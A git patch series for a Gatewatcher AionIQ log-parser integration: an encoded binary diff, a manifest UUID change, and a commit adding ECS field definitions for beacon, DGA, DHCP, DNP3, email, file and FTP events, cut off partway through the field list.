z1+*ya>du}^F{lcDT>3D{M0C$RR$iO#*Yx05B9w4BfH#EXk`T(DH>si!3DTbYTt86W
z2mJfKb^^P18hch-+S^fB`$!AjKi&k;e;k{f>v;RI&^-+`)a>R18kCj`8LzrJeP=W>
zNoKYzyQS)%?9r&xZ74k9M1(Z9vK(c9)sk)8#50TRSaG#UA=66;H9)NVSfjJF1~#q2
zhz{5vb*Jj(1XSlLk55|Ro8<lc>{Tp6-eBRSHHu+JjHCZE6GhVLyd940`HI$c(t9wN
zpqKJv4AvQpDlsq>0QKiw;>IKg(q9~96YTp1JXRe`zCfJ$68+rg!FgMD`@r`)Q}-co
zwo<v0II{pcF}}HQ|I_0?e;2>GwLfXI0k87^IS#tIA3HMrb0dKrEQzCWvl~~Feimwy
zu(5K)y29gYIN(cmjYWrMsgbcFD!zKLZVq`5zh1On`d;@rZvKlr$L?BLkAI&mnvrQz
zH&q5-TcrkjpnhC@6sxpD5Df5I9C#F)MiGbpI~9ge!2eL^`XP?>sMUnMliux*B2yqa
z?;?~wUB=DmuUr0!D7-hJT2BY3uEfp-D>%2V?FxzUX|~ZStUUW42#C5Arn|7<K=G>l
zhxtYfEbQ5o04muF=AQ(JKb^?o>ZWyz7c1a21HdqaL?kioE1X2xZ02guh^;ljzc(CI
z7mZbeYjXjj3SMGw*zIiJ+Vj3IMYV@_5ZsZ76;Qcd*>L}^aYk)PKcVh)x~Tj699HcS
zrc{K$Bq^JFGBl0s&2wUD^IbN2#)4d{f*sICh<W3B$k@x+kHRgqQ}_ooI_wuaGLywi
zeW#1c*tg?t?(Gu2^bl@V0~Q2A@j#`}u7r~(Q7TV;{Z0I|-x0!}tv1Zq;?gF7O7qej
zu5T=_Z<%2RQ|LfD#y|*hp{`>#;eZ(zzbl)y+Rvq_{urKgtWxh`p8>^%WJK+HnIb1!
z>lja8hN&-$)pTc$)N5s;xgtcWvtuv#@}qMseJp0rO^jXnE962M)<_NJJTjj5FD5wl
zE5O`QgriN1Cb<HhmkGM)!y#F~gr`zZxF#VS@TAbksCdS0<84X3p%Al>ec3SSKYy20
z@|fMvevHt?>5Y8ERXhPev42PxB@TWIn@pG&_L$1K3<052U<zLoZ)7mLZVI|FQ9;LC
z#B>8!EHXf~J+FnQ5UE#W=Y3`_nB=Q&0+G@fFszgEcpxOcjTbO%;RnyCpd?}Dy%8Ef
z2N_uHsQ$1>!urQqL2_33OY(>?kVn_aF4TwpTnmyIK=KT(rhA#hdS4KaOI$2s8$Tgk
z7Jr{HpvZwXAB0#8Wzm)k4u1N7<^(8$8^;6k<akPOCTKk>M33*}56gHQrM_ti0o)wN
z2mrn#LU2rvtBiT?Z|OfYomOz5@|L<;5E96-OyQTYT{_tDCD5N^q0V@5Vk2+|7x$b6
zpvohlkqfBCP7(Sx&HAc5Z(Nbh4^v)-^_)NriUm0H!ghS442VCl_~AF6ej`M`y?a_l
zu1UTY;?1ahcaClVNc8?L<6n}e<x1YL+_|8#M3LAyOC}L(d$jSI=0q1L+tK>;8^7JK
zOrN-L82~sN$1^6~W%?2cuu1qrcUm+Vx5p)XG?XNYlGVM5TEvRe-6qxNn|?&`GVHvy
zTIfvPeQQRdsRZP8>>~J!pLp2t@>upTViMCr${yLgZdu40Lz>uAF5iB|uFgHwm`zD}
zW$ANN@f<S}e~rd)r)}`q@xtLYX=;_WUw;lTW+k#l!zIJvp77n7>!7)ybov1-!u%*m
z$EKSl2#{lNYZpy%D8=EkV)h{%aKY(3)vB-eSaH)qB3Izx;Qh;6kLyT6?lBRUiT{=$
z)+Pq`>X~INN|%=(;a?nAR!C#~U<fS{OvPfe$nXg%^oIjJySgR*cQi1`&|fE%wSo-L
zx1>&7%7J8&zQ($4E_{(RM!MCjniyY}y`O{5f@hVHwKOS(-X#3(^p6tXRH{;?vPm2f
z0D1K?^n2Ssb1Mv{K9nsFQkqg=b(LShG2dXs6qM~tY|+y>Lh+d^mdk%pKQjHnh5Y$e
z4RE%VkwN$@3x0HV#`RsCe&I<h;nL{?MR6RDV3miCMF}w`OQ+Kog#5U2gcN>K1T9K^
zf>qHEzbhsPUTP0S7SvER`Ay_fzQ;$vIsj`-bWy=q)+#Ufd<Kc-59&KMn9%T;$JKyR
z-(h#(GA4eFV*oUF7}Le7=m}j4OSOf3kzi%!ajHB7DUnLMUIv;agO=^9PfkL09XpW+
z9Baoo>(BSh3_58jJr&fp0GV1CNIWA)qKJcJROyppl1Jr}scdns<Cty~zA3@B%8mTb
z)5Q>Wsv(`g_u9h38}$YS|A!X&?z94HiIBFiN%GL{yDM^8bF}Ge|Jw#XB63kyjc?B?
z1;|o9_OGt`DKr-t7#oxiFTOgb<%b%1%z9`7ppEYCSuC_4ZOjdHn#K_Qq~^w+9oRPP
zY4%o)!F+Mwp5CL@07nF2V_;51hR&GGkUvJ_DmEMW;bCnF+LP(i2m$?E_Rls4CYk6+
z6;7`-AB-5C@PG7?uUm-@HEzZ6l=)@)U*_=vnN(5Y7H|=1b1X7W-|RNqEqO;amGaZk
z-Dd^98BB$L5jH)(=s6C@_>kId(9w=ym6|>$9=@U}8fN7gAjn@na}5C0RpaI@J;mk)
z5Qkvz7kOm?diVA~B{u4_E_@A*EU<0a0hNx-%F0iX&Eqh`(BG#Emf|1by2>BCQ6_4N
z7C$<8G-40z$a*#NE|@>Vh8%O)8musjBr?{B9=cp<M2|Q)5agr3b+P`hkKF4_e&SqY
zmeXD?{OR|p6`}18*lF9{-8tdIg?`EWKRU{=HX<hA8ye&{gVBoZ2XbGW;)v@AHIg=<
z1?2oYKc_wYZkxO7mi%~c9^d&4@Z4O<QCz&qwl>1*W$>w{#(;3$UGqP*`%wf7NB?-X
z7SYupbXj#t<EY5C4S>Mo$Q&{Ya%l!bJDF~>tS-Jo<$mw=w;amscQw{Pk&3zxzv0vF
zxyF__#%;qLbKK7!r|vdnxw~>)gG6S|gkhK=ilp;3x8Wb6qW|%~h~9t$o5lH9Gfm1{
zrn)GlM0j!6!@MW&(_OZiQ~PnlgeTV0lgqsmCzHvwR_wi#l>@3}MA-v7hb)1;bI>Uu
zKO+P%34nKIunyYswg6@PiTH4p&Xi1Pi12rBsXNXC0FY-Em_(h^)~5Zq%@}64yzP^y
zqPQsE4uQ_@zWFACacekN(D`u3b9*@!00wGO;1M3G09+H*0=zeV7a{S{(`)Te-UJF<
ziWXeVwXIpVMsiU7)ps0jN|+PkwU(BtdkEGP74;u0ed3?O$aWnQ5tr1Bxz(&#Tn8iB
z@If(<AFM0-Gsy9eJo~~v)o4(!tZHp1>%godZdQXuVc#H<OJx)md|60)_W>67)jjiw
z&%kz5^gKhCeqsIJavV2GGd-w&I@pevtdDby2U&FJ$+aUft-arVVJs9@0~hT4Pr+f*
z9Zx}Hgmnx7<CkQ0)IIj*HtPoiA9Z#=thY%?+J0}H{rfOYuQ=|=@uTNUGsS3^?D7OB
z(xPMp;8<ZFwv(HK%d)LpsIBk;njUfX=cDvA9L9~_q2t8DNr234;-Stg=BBL40V5KO
zf+F0OUh+-zhLf4sM)t|35nZ+j4P$Eix-63tFESt~=$&RKumJO5ll?R_?uTX>7VPxb
zL^_2olUUcb8enIHG{31Kd`%j<>sEw^UG)+oJvYcZ6=v%mH#6==K>|SljPstH$%&%-
zK99TS(a4(b-4f%s>(#Tlj2$YV-;xirw3m&-%TBxi)+=QXhurg!Vg>+hO7q8bsLBdj
zRXQn*|Fh(#wM)&6?h~_`s~N5^HwB}#_<g=lz)X*`=$p(&qi=T9Q$}cHap?rje!a&P
z=dZ-EYjCgt9BcAOI3U7I%$f`v3+t`{<eqgJ&h8ig9+mh^7lWA^E9CB7Yz;`JW?Yi;
zp7(;PF1*6He|AusF+hyj>!s_Hp&Y4)os%mcYiF8Kz>^GZe=_WA!=m=ABDsXg7J}?L
z&a(EN2TMGk%?<+caar|}PxWgIP>ezXtgfo;FrArj5k4!&mV@0Dulh;S=-11(FcrXS
zrs}BWL;EiyWQYj@fZp3f8J~fysQy$goYeJFhV_6#x@h@Z-K(Uz+B|HtIpJB~+H`Pv
z+n{Z#Kpz2PijFmmY>n7bCpD;?<-t8=BJB(Q0>Gut?#TkiTbwJwj8t(mae?P+yWN&J
z)&$T?71o_Bz*R*DA(1z~qQj=iSY3~fo&-A%u#iT7&S`C83{?e}to@;Lm6v9`LKY%n
zH9^d!_C@&pC2Fs>VpvSt9cU%t-gkTBAj9)IkufH@y9-`I{Y$--NAa1zE@5qDK3A0%
z{o*G!DYJSo2PoE3%CL==9*A*|p@Cg3J_cbp9Dv`SNi33`JzpUYk)WSQ6KZVsm^IfM
z>G9SJKy3xvMpZxzx@^#Jt3#<iN%!pFg`Gt_!poXfynpzj;(c8*GcEiQceFh75fpeZ
zvmP-Rs9n>^14$JrNfPy;8pr-l(?kQOZ{3hJj!P+quV`e=)CIMAMB9s3_hcYl2_J6t
zJJiACiI3Rr0Wm?TQG^{l`<_Zo-qTWR9#r78w_7cbz(y1_MJ8?OAb01oJxIZ*-kv`<
z|59^3jGIe@Aq|>v?RWM|qeL;`fu5cO%!#zY<HzYdoc44Vbe4f{ms?JzFMmqOZkKh&
zUr+h3?#V)iyj(pO526)B*dU9u7@oN}6PxN@K@DdnbHjuYpe>X$@}^gLWDNV1u*cO}
zh8y(y@^zI(>8&Q!P4z#aPejwq4C0Bsy7#fyIz@4aqsca52cEqa5?NojM51}H!8?Xr
zHwt^O<!vfXFNeaNW%AaR4)=DQf*WKseXA#ho%0?eB(twgR)#*o+YVF+J+%09!JTFK
zNHMeC++YKb3<4+w0Chgc6Qz4v78B5e4oWP$CXABttXiB(ZV@(IZS@`mVYbF=M|5K6
zAu)Ne7MxM-7TFd<GhR0*>8atL7nR(8d07O<2Bh`N4XDVdWYap}Cqy!iv<)qV?&_v#
z2gJ-qXH{MHd?1r_CW1Kv{HTtjr6+$%EAOA(s?Zz+K#@eilYPU5_htCUX3=P|pXpFy
zV7lkjMPutpx}lc8;vj1vqUHd1!aT1j{4wl*=A^iMZW<zujz&;Mwc}!;1nE%2(MB)8
z0mMhuLF66HxnjD8)0k$9Fd=jVD@Mp3jX2jXxAWCzcWz@|hB?x^n?E~xTF9uiUo~N_
zXAyShvH5?#{cS&|UU&c<tZ-*1jXnN63)vkyjs&jfwi%zl)as2h{&%Keyo9WPvv}-F
z#<tI|)%9_V)c6%7p6jq5n^pho$PUC)nlof+oMq9#`W=w#Msy~s{q}EBWZW7ApwS=s
zU`=IS#WcvKyw3a_y;AFc-eISFC&&#1%fO)NwN?3Pb$?|rXf8IG8L+|&z;(+_pYt=j
zKDJF51b5)|-~_63O2tgGJ=PC9RpFywT%$Z=JVdpxM8wBexz@Md#c$j3o#P{=J{MsS
ztF#c-K@y;I|JgDe=ys{ZBYt1f1&BmnG#kLr?o`PU5}i9*tpDP=Q^1U{eZ6sJ)$G4d
zeplc!vUBc{llD?nHHQccu=XGRcY9oC`x4)mK=8rAeL=Gzo7?ygbL3Ag60k2SpvjHP
z1%RKgNzonc#np|R->uM+Le65h`uw+D+fihk#WL6WnWu`mr3K|`tiomLolEl#kNhh>
zrvH2t^<*`|V-4103A`F3>BR|XyayPC`uZL1KVfR=&1%UbW2@^8x!afciL_J^I*cn3
zK9%OAdJU8(pJQgV;rO~yPI<y?tpAZ3%C#5W=7SKevA((tG<G?1I#U&4<O}bi8UCl8
zN*;B7YSqn1O&b7pe4LZQyHKhopBXMIpRZV6OLW`M{;@lKBOXm$1OS9bk{7{nCz>^W
zJO>91u%yp$wb3YK1GG`bJV#rB$Rgd#ui&deozmKOy{VMODx+%Q#OrqOq~Zm#6@jc3
zk~8Yfr%3WRC(1o0x*aiuS4s0is8}XrN~V?DOTwm}B=e61hgLMeltq836W0VSAQrMd
z9UE(#)C^s4hDkQu5(bZfRz65UuTh!+wQ`M}_^KqY18&WLJW9z8AcW^l;{VTb_lE3l
zWR5Kl`VBNPV;bFHvcct89OIb#abm7n;*#h)J8;J|k~bo(9KBd`w+a}u{VFoa4{aVd
z^X5^G*oMhsLi=fHd@%sLrl&bmfyS~yTWa%Xmo~dr7MoB|<!T3me$~gJ{@O@&OmC`v
z&T|&4t7_7+m+F0BM7(Co{oC{>s#Hya+>+}WZA-iB<f`Y__<<8uw$2sk8t|$7olggk
zymcN3nxcX?rU!#>@Nrz0!pDN;rIyFtL_zEOgLg#!*Iud0*vvvPrOdF?urFdfoxPKZ
z;(PY$GPo?XipG)pVvhtJZ``V6Rtu3>IikNV%U}XJ<*`JVm0ar-h}|n9w0ZTP;ZCXh
zR(uG)^FF)wKPO<&q!zm09HwWBr3KLMhYm69bl|loupnT#NH2V{$8CiN=Se`4((0Hp
z?Du896|yW2CzUm>^4wt5yCee{YGv~tF8c<K5AS&0CAPQ|-h6C|m5!c&sTg%{S|25-
zP{;^g6f2}F60(!DdOBv6b5Q#`4FxphBVY}BBt`hl9!B;2UzsdPe{p1eTt&@@p-a7i
zfeoT-@g;)?G^~5=yeLR|?!K0mmf+PPe8vh1V_C^|=4>Q6pCcT{1?8mG%3tK9zTMX^
zKnYjD2H^~52a^&)B{;DF!j{!?e((O$Co8s@ldX1os?oRyo*QC$p-c&fCCxBeUU@4c
z=BE;Fa`HJCN}v%6NDSkzjC%2%eW8!aZ@NIZ0mb$bzWb|k0;#@Wh{4W9$O;2u%+DWt
zOsg5JzrhwB>>PHC6j(o{^-WpGby1;mA0Y_G_dto?sf=dDcOPG!?a3^PN+luL`RY;z
zw`<((MX*+j{)8yNUq3^2*(El%FHnj`7}H37zJ<_)%?IGCsMjo0hE$Kt5<peJS!V;|
z-hU>r4H;9hK*y&Wu?fdMvhG(IOu^s0zX|(odm`p^*{CulM1p0oJ7-{|kSib<Y9&T1
z<p^ujeKG2}F?r^4vlBRxU(Fki&$V7Ujt4c6U8DesWHlT_&_TXl`tjAjDkYw3X!#jB
zNQ%>gjeaa>;cravh6`L4a`B1&$_jc(;cCb6beYc-A46iBm9RUJaH`ef^`~Hfxzn1i
zz>%$J$uph(KMwhsZCA(?<~9KHsc*V(CprtH%O=ork@Ex3+Di&o$PHV<sQSeZ1^ekQ
zl$0j#kK!_QnT|7y?aSTI{yisN>g}I@?j07FYh^Z)Yrb5=|9rNur>LVqb6BXQSB)QR
zLHgRUd#{U=A6kl(|Lpatv5`;VtqYC31z=_bff(zlih%>5RZ1pdRB9QhQ@*>yf+p@F
zq=BUHf4*d+lZ>#QXyUxE{KXr%E-UJA%$#@}Y_@_&CH?co5%!iB)Hya>ATFk%gn5Ra
zsos8=a#uBX8mFge?YWnR>@%i0rc5H@Lf-_UZ@=T_=t-u(u1g}K-fjq^$*Lod5So5O
z9TwW8*|Q?)y@<~L=55tGbe6oJoUPq3eoNB8Gz;ezL1Lma5a;ub85d!M+9KGsPtPPU
z=kL+qH;D(i`2rm0Msuv-d>ENr9O0k>iLh_t0#UFU-TecJfelfDMq!fevqE372%u*e
z(1Q)JV3+abz$##>DeLgQg7=3abWo^&+K5;#npv3wxDmXWl4+=w&HL4wR5I}lr_>L}
z-q#q9ZpO$}GL4$S&&qAi>{PxE-GJvM9(rh+7m<X~12XGglqf;BvKaH~N=%So(xFVd
zPR3g<su?;zuW3W%`W;o+|Ky@0BO-36(m5VXY4Npif~3irzBqGmDol1Fn)}5qXn^I6
zd4bcAct<=>&y<^N+cV}eT|D3f>hc7honwBY=fQ!h<0bV8dQu?YLmS-suFQbs(AD?!
z-ef)iO4Wq5!w=xpAcI|lHd&F!aGH*J@y=(-Z#%#lYBT7`)KcOAmxh!}P8#o5ujGRG
z2bxAP3nRyQe&`=F)PoE@1<8{V_8<Tx$UNdTZK&@ER^ACbh|H;5?10a*^mTLsNG!Fp
zMa^9LfV&6=t0KpIyO_`b;=D{f7T8r*@SA*jEkw(-36=bud7`v~NWFZ6?BQx8`!$^m
z7XiX`^W0zWu+eZMo#qb-r*0A-Sw%(p(amU0q=QAABWm|nQ0_zF;HMco_Q)^npzja;
zgg$|&h~qF<u7xQjy%DSDRB;01ar0d!z>X^_#NWS&^6TRlaUxruu21H#hzI=Wxltrf
z9ZBAw=YP%+-vj591kO#=)YA=d5jL2VOarTS=u-mYw!rlHKaaks=f?ANp5^IwYIa~}
zQiXG2+;C+Odh7UKBjt2;%>o0TaSv7@H#SJu@W&=RZzHYDm1t9N{4CUFo|M*xHUi!%
zFjf9biVTiyX1X3dShR{6qjqbNyDw>8>@bqLft$VGz!g(c&`}AW+uVlv463^*2q8x|
zB&~hzfDDDgKfBY*xz$SA26rVirV~P@6*df6iX1~3La9EyxanaaKCJ2e&V?&EJ^A_Q
z{$Gk=*Vr$7qi2K8ZJ`JF>x%0XJa<7Dt(r&Dr0uh}s@_bMcAKJrq1wDyZa5y7#7r{O
zWc`=2f0d&vo_e%i3tgDBhLFF_t}7z42;{g9C+G8IJTwqj<EplP>%G=tyo|Y&QEnr4
zw0@#1!r4r-;TQ>P78K4r{(<$2&u?(g()zGz&CK}+WgSY^d4B1h<9w|&eOp+9nHI93
z+P37u%TEFVWa*KnPZb3<k$MWa%6cHc!eSDTYfaS<GupaUrTGAxObKR#I=q(RuM#Si
znj4^p{12V5-6z%kqCw7@Z)f#T(<gkE6(wbUH$D$=0yr8O8v6Z(xH17uGP(J`N%6lS
zoPtD<W@lANL4M6Okmp6mNA!%hD(ymNf=)(VVI`QAT4W$G7aIK`^$UaD<ECH5qN)Af
ztQ<JSg^xiQS@h;rvRSvCWu25`aT`+J)QBcA-;aIBV|dwCdoazJu<yfK0rq%DRb@yT
z1rA?#+f{?!(G$CP+o)fF<@VE1=f$J#p7;YoS0`u9mD<eH!TTV}N2hEZ=I0i)ONi?l
z_mlWzTuz`PdvILeTQeAz)m}W?cC6*}5|uAtOi5Pzf5z4%;IDUo^D55%Q8*+Bl&^kj
zy&oN|?xzfbOF-yCKEIty*1ogf6z`l$=<EOY_VFveHuDqw`cs(}^Akj7?dbq$ms~v<
ziEg4)xyJ^AK^Cv)_$l)|Q7JO6kA5qSMJ_ijcWi2+s8V5$g5(q{Wc`>%&Z6v-&L4zT
zT@Y^|5obbv`V2m?3I;L;O-x?6qn9Ba?%UwDA`Zr}!x_NXVfpCk%o~Gj1O{EjA>f$d
z=T|Wm$CD6GI95S^?FtTJ=d@<Eyi1>eBM^4m=ZbeK7|GSoEnfVh;YX@ZGmd>(@Tlc+
ziQqP$S#m#<gHQvqm@y5jH5Et2C1I=CS@4~so!*`DlsOa&!*rDa#`=zXuj<bK89#16
z-IWwQU0_2#{M2;H0a?(-iR&kdt|!1Wq&bxHzFPF(NztR%%NG=pW5F&7Bz69B$wfy#
zQJlqNBH3wrpuHKPzFUT#>-u#~+0@`do~*;C7+jvbJ||e^b2R>h#lMr{5<U}-FQ|^V
z<-9%wr&ZyeQ5{`@2Qt>KDYqA3chIunJy2f<NC-m$`5lQCEB?b#YwuA`fxVW}t(2;O
zu~%#ml0;wg7KNu;glw9QH_=^!T+tLZwc%0T$=2>xU^-X)hZ_0MJZ5!z7@S>vV@7g0
zd#0Z#>*Ge4peY8(;W`plr~j{gNc)%b`MXEoPG&R0Kyh5#cX0IeXO@sMcdvl;0@%!9
zNQnrFEuhtU{9s5EhTR{RCuM_aMvkDFweJOdmdjk|7e~-S4@#F8qn6bL&7=l>=zWwG
zjVD}99)+IBHj={O)9x33gBmTk!$U38tU%DRTbXg+d{pMp0F&pkT}iEKj3b4|O9VCu
z5}l7*TrB^z=`!`H(%i4O{CoqHE(%n$T)u@p8k^tD{NSnI3M~rael1gl;}jB7B8x{G
zteoj+;>tjhh`=R8h!dm@nd;HTs)r^+FHD#5`FKlXKYCLgD^rJ+$R07Sk$G67HPJ>c
z*KYJLtC#u7W9a&T$~r_RwuSbiFl*l;Q`wXj#){?hxGhtWw2T+3prcLAIBW^=FS6OG
zD{jEp4jdcAE$n$ZOI8{jt+oySz-Xq4yCiINHELwYqdLcXb#;ioUh_PlmYYIDlN_jN
zSytdhunS(C8!S?B&6=nsfb)(utYlyEB<xE7E89Pxk|Ho=$*Wu7B^aAMN}`*EE)+LG
zo#OA(C#vYywH4g2LPK?hCNsb(RW{<t8pWC<s6@-}D_(FgInp0;oNJ?NDi&jt_OK~V
zhI`2}h<vC-t@8DlcAbo#JBc3!Sq0!POPaI|1OHh-;Pd|lsK&pq^9Lw^4#0<%IVbKr
zAvp6(3Y3d}{eJO6R$3nZ2i5m<#^cNk6$LBg=TS_A)7NzzK(4}#K_xHfg&qq_bB0x8
z_Qo+Quf^Ev*2rVWkjcj9<qMqm1-S4MVVh9z4_>Rk$GME$=J*b|zw)Vh!p=sv`?>Li
Zg53KJdXMw57+eXUDEn5XO3F0k{{to~p(+3X

diff --git a/GateWatcher/aioniq/_meta/manifest.yml b/GateWatcher/aioniq/_meta/manifest.yml
index ca91ad93d..a540d5536 100644
--- a/GateWatcher/aioniq/_meta/manifest.yml
+++ b/GateWatcher/aioniq/_meta/manifest.yml
@@ -1,4 +1,4 @@
-uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26
+uuid: 0825709a-5f76-441e-9dfb-2b5ea6ce551c
 name: Gatewatcher AionIQ
 slug: aioniq
 

From 11945edeaff93815c184a2cae0514354cb82e48b Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Mon, 9 Sep 2024 17:57:00 +0200
Subject: [PATCH 009/317] Added the manifest and fields files for the ECS
 parser

---
 GateWatcher/aioniq_ecs/_meta/fields.yml   | 1133 ++++++++++++++++++++-
 GateWatcher/aioniq_ecs/_meta/manifest.yml |   11 +
 2 files changed, 1143 insertions(+), 1 deletion(-)
 create mode 100644 GateWatcher/aioniq_ecs/_meta/manifest.yml

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index c6cac6926..e6f4b0b85 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -1 +1,1132 @@
-empty
+gatewatcher.beacon.active:
+  description: beacon active field
+  name: gatewatcher.beacon.active
+  type: text
+gatewatcher.beacon.hostname_resolution:
+  description: beacon hostname_resolution field
+  name: gatewatcher.beacon.hostname_resolution
+  type: text
+gatewatcher.beacon.id:
+  description: beacon id field
+  name: gatewatcher.beacon.id
+  type: text
+gatewatcher.beacon.mean_time_interval:
+  description: beacon mean_time_interval
+  name: gatewatcher.beacon.mean_time_interval
+  type: text
+gatewatcher.beacon.possible_cnc:
+  description: beaocn possible_cnc field
+  name: gatewatcher.beacon.possible_cnc
+  type: text
+gatewatcher.beacon.session_count:
+  description: beacon session_count field
+  name: gatewatcher.beacon.session_count
+  type: text
+gatewatcher.beacon.type:
+  description: beacon type field
+  name: gatewatcher.beacon.type
+  type: text
+gatewatcher.dcerpc:
+  description: dcerpc metadata field
+  name: gatewatcher.dcerpc
+  type: text
+gatewatcher.dcerpc.call_id:
+  description: dcerpc call_id field
+  name: gatewatcher.dcerpc.call_id
+  type: number
+gatewatcher.dcerpc.interfaces:
+  description: dcerpc interfaces field
+  name: gatewatcher.dcerpc.interfaces
+  type: text
+gatewatcher.dcerpc.req:
+  description: dcerpc req field
+  name: gatewatcher.dcerpc.req
+  type: text
+gatewatcher.dcerpc.request:
+  description: dcerpc request field
+  name: gatewatcher.dcerpc.request
+  type: text
+gatewatcher.dcerpc.res:
+  description: dcerpc res field
+  name: gatewatcher.dcerpc.res
+  type: text
+gatewatcher.dcerpc.response:
+  description: dcerpc response field
+  name: gatewatcher.dcerpc.response
+  type: text
+gatewatcher.dcerpc.rpc_version:
+  description: dcerpc rpc_version field
+  name: gatewatcher.dcerpc.rpc_version
+  type: text
+gatewatcher.dga.dga_count:
+  description: dga dga_count field
+  name: gatewatcher.dga.dga_count
+  type: text
+gatewatcher.dga.dga_ratio:
+  description: dga dga_ratio field
+  name: gatewatcher.dga.dga_ratio
+  type: text
+gatewatcher.dga.malware_behavior_confidence:
+  description: dga malware_behavior_confidence field
+  name: gatewatcher.dga.malware_behavior_confidence
+  type: text
+gatewatcher.dga.nx_domain_count:
+  description: dga nx_domain_count field
+  name: gatewatcher.dga.nx_domain_count
+  type: text
+gatewatcher.dga.top_DGA:
+  description: dga top_DGA field
+  name: gatewatcher.dga.top_DGA
+  type: text
+gatewatcher.dhcp:
+  description: dhcp metadata field
+  name: gatewatcher.dhcp
+  type: text
+gatewatcher.dhcp.assigned_ip:
+  description: dhcp assigned_ip field
+  name: gatewatcher.dhcp.assigned_ip
+  type: ip
+gatewatcher.dhcp.client_ip:
+  description: dhcp client_ip field
+  name: gatewatcher.dhcp.client_ip
+  type: ip
+gatewatcher.dhcp.client_mac:
+  description: dhcp client_mac field
+  name: gatewatcher.dhcp.client_mac
+  type: text
+gatewatcher.dhcp.dhcp_type:
+  description: dhcp dhcp_type field
+  name: gatewatcher.dhcp.dhcp_type
+  type: text
+gatewatcher.dhcp.dns_servers:
+  description: dhcp dns_servers field
+  name: gatewatcher.dhcp.dns_servers
+  type: text
+gatewatcher.dhcp.hostname:
+  description: dhcp hostname field
+  name: gatewatcher.dhcp.hostname
+  type: text
+gatewatcher.dhcp.id:
+  description: dhcp id field
+  name: gatewatcher.dhcp.id
+  type: number
+gatewatcher.dhcp.lease_time:
+  description: dhcp lease_time field
+  name: gatewatcher.dhcp.lease_time
+  type: number
+gatewatcher.dhcp.lease_type:
+  description: dhcp lease_type field
+  name: gatewatcher.dhcp.lease_type
+  type: number
+gatewatcher.dhcp.next_server_ip:
+  description: dhcp next_server_ip field
+  name: gatewatcher.dhcp.next_server_ip
+  type: ip
+gatewatcher.dhcp.relay_ip:
+  description: dhcp relay_ip field
+  name: gatewatcher.dhcp.relay_ip
+  type: ip
+gatewatcher.dhcp.routers:
+  description: dhcp routers field
+  name: gatewatcher.dhcp.routers
+  type: text
+gatewatcher.dhcp.subnet_mask:
+  description: dhcp subnet_mask field
+  name: gatewatcher.dhcp.subnet_mask
+  type: ip
+gatewatcher.dhcp.type:
+  description: dhcp type field
+  name: gatewatcher.dhcp.type
+  type: text
+gatewatcher.dnp3.application:
+  description: dnp3 application field
+  name: gatewatcher.dnp3.application
+  type: text
+gatewatcher.dnp3.control:
+  description: dnp3 control field
+  name: gatewatcher.dnp3.control
+  type: text
+gatewatcher.dnp3.dst:
+  description: dnp3 dst field
+  name: gatewatcher.dnp3.dst
+  type: number
+gatewatcher.dnp3.iin:
+  description: dnp3 iin field
+  name: gatewatcher.dnp3.iin
+  type: text
+gatewatcher.dnp3.src:
+  description: dnp3 src field
+  name: gatewatcher.dnp3.src
+  type: text
+gatewatcher.dnp3.type:
+  description: dnp3 type field
+  name: gatewatcher.dnp3.type
+  type: text
+gatewatcher.dns:
+  description: dns metadata field
+  name: gatewatcher.dns
+  type: text
+gatewatcher.email.body_md5:
+  description: smtp email subject_md5 field
+  name: gatewatcher.email.body_md5
+  type: text
+gatewatcher.email.from:
+  description: email from field
+  name: gatewatcher.email.from
+  type: text
+gatewatcher.email.status:
+  description: email status field
+  name: gatewatcher.email.status
+  type: text
+gatewatcher.email.subject_md5:
+  description: smtp subject_md5 field
+  name: gatewatcher.email.subject_md5
+  type: text
+gatewatcher.email.to:
+  description: email to field
+  name: gatewatcher.email.to
+  type: text
+gatewatcher.event.created:
+  description: Event created field
+  name: gatewatcher.event.created
+  type: datetime
+gatewatcher.event.id:
+  description: Event id field
+  name: gatewatcher.event.id
+  type: text
+gatewatcher.event_type:
+  description: Type of event
+  name: gatewatcher.event_type
+  type: keyword
+gatewatcher.file.file_id:
+  description: file file_id field
+  name: gatewatcher.file.file_id
+  type: number
+gatewatcher.file.gaps:
+  description: file gaps field
+  name: gatewatcher.file.gaps
+  type: boolean
+gatewatcher.file.hash.md5:
+  description: File MD5 hash field
+  name: gatewatcher.file.hash.md5
+  type: text
+gatewatcher.file.hash.sha256:
+  description: File SHA256 hash field
+  name: gatewatcher.file.hash.sha256
+  type: text
+gatewatcher.file.magic:
+  description: File magic field
+  name: gatewatcher.file.magic
+  type: text
+gatewatcher.file.sid:
+  description: file sid array field
+  name: gatewatcher.file.sid
+  type: text
+gatewatcher.file.state:
+  description: File state field
+  name: gatewatcher.file.state
+  type: text
+gatewatcher.file.stored:
+  description: File stored field
+  name: gatewatcher.file.stored
+  type: boolean
+gatewatcher.file.tx_id:
+  description: file tx_id field
+  name: gatewatcher.file.tx_id
+  type: number
+gatewatcher.files:
+  description: files field
+  name: gatewatcher.files
+  type: text
+gatewatcher.flow.bytes_toclient:
+  description: flow bytes_toclient field
+  name: gatewatcher.flow.bytes_toclient
+  type: number
+gatewatcher.flow.bytes_toserver:
+  description: flow bytes_toserver field
+  name: gatewatcher.flow.bytes_toserver
+  type: number
+gatewatcher.flow.pkts_toclient:
+  description: flow pkts_toclient field
+  name: gatewatcher.flow.pkts_toclient
+  type: number
+gatewatcher.flow.pkts_toserver:
+  description: flow pkts_toserver field
+  name: gatewatcher.flow.pkts_toserver
+  type: number
+gatewatcher.flow.start:
+  description: flow start field
+  name: gatewatcher.flow.start
+  type: datetime
+gatewatcher.ftp:
+  description: ftp metadata field
+  name: gatewatcher.ftp
+  type: text
+gatewatcher.ftp.command:
+  description: ftp command field
+  name: gatewatcher.ftp.command
+  type: text
+gatewatcher.ftp.command_truncated:
+  description: ftp command_truncated field
+  name: gatewatcher.ftp.command_truncated
+  type: boolean
+gatewatcher.ftp.completion_code:
+  description: ftp completion_code field
+  name: gatewatcher.ftp.completion_code
+  type: text
+gatewatcher.ftp.reply:
+  description: ftp reply field
+  name: gatewatcher.ftp.reply
+  type: text
+gatewatcher.ftp.reply_received:
+  description: ftp reply_received field
+  name: gatewatcher.ftp.reply_received
+  type: text
+gatewatcher.ftp.reply_truncated:
+  description: ftp reply_truncated field
